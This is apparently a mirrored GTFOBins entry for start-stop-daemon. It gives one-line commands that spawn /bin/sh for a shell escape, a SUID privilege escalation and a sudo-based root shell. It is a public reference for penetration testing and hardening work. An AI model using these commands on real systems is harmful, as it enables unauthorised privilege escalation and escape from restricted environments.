mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 23:09:46 +01:00
10 lines
222 B
Markdown
10 lines
222 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: start-stop-daemon -n $RANDOM -S -x /bin/sh
|
|
suid:
|
|
- code: ./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
|
|
sudo:
|
|
- code: sudo start-stop-daemon -n $RANDOM -S -x /bin/sh
|
|
---
|